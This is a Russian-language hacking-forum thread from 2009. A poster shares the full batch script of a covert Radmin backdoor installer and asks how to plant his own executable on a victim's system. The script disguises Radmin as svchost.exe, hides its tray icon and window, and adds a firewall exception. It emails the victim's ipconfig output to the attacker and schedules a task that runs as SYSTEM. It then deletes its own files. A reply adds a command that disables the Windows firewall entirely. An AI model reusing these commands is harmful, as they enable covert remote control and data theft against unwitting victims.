Как заткнуть брендмауер виндовс?

Discussion in 'Безопасность и Анонимность' started by SKIF86, 20 Sep 2009.

  1. SKIF86

    SKIF86 New Member

    Joined:
    18 Jul 2009
    Messages:
    10
    Likes Received:
    1
    Reputations:
    0
    Я наверное вам всем поднадоел уже.... Итак нашел статейку на античате http://forum.antichat.ru/threadnav97202-1-10.html там сборка, SFX архив в нем радмин и есть бат файл. В бате куча команд. Но есть комнда каторая регает в реестре радмин чтоб брендмауер некричал. Мне нужно узнать что за команда. У меня есть ЕХЕшник который будет слать мне айпи на аську. Как его зарегистрирываать в реестре?
    Вот тело бат файла:

    Code:
    
cmdow @ /HID


copy /y "blat.exe" "%SYSTEMROOT%/system32/blat.exe"
copy /y "blat.lib" "%SYSTEMROOT%/system32/blat.lib"
copy /y "blat.dll" "%SYSTEMROOT%/system32/blat.dll
copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe" 
copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll"

netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE

REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f

"%SYSTEMROOT%/svchost.exe" /install /silence
"%SYSTEMROOT%/svchost.exe" /start

%SYSTEMROOT%/system32/blat.exe -install -server smtp.yandex.ru -port 587 -f вашапочта@yandex.ru -u вашлогин -pw вашпароль

ipconfig /all > %systemroot%/system32/ip.txt

blat.exe %systemroot%/system32/ip.txt -to вашапочта@yandex.ru. 

schtasks /create /tn "security" /sc minute /mo 15 /ru "NT AUTHORITY\SYSTEM" /tr %SYSTEMROOT%/system32\ip.bat


del cmdow.exe
del blat.exe
del blat.lib
del blat.dll
del raddrv.dll
del admdll.dll
del svchost.exe
del install.bat
    Я предпологаю что это одна из этих команд:=>
    REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
    REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f

    Но прочитать их немагу.... Обьясните что они делают плиз. И как мне при помощи них зарегать свой ЕХЕшник во вражеском реестре....
     
    #1 SKIF86, 20 Sep 2009
  2. ReanimatoR

    ReanimatoR Elder - Старейшина

    Joined:
    27 Aug 2006
    Messages:
    120
    Likes Received:
    118
    Reputations:
    34
    netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE
    эта команда=)

    а этой
    netsh firewall set opmode DISABLE
    можно вообще выключить виндовый файр
     
    #2 ReanimatoR, 20 Sep 2009
  3. SKIF86

    SKIF86 New Member

    Joined:
    18 Jul 2009
    Messages:
    10
    Likes Received:
    1
    Reputations:
    0
    netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE

    А что она значит? если у меня файл называется 123.ехе куда его нужно скидывать и что прописывать в батнике?
     
    #3 SKIF86, 20 Sep 2009
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.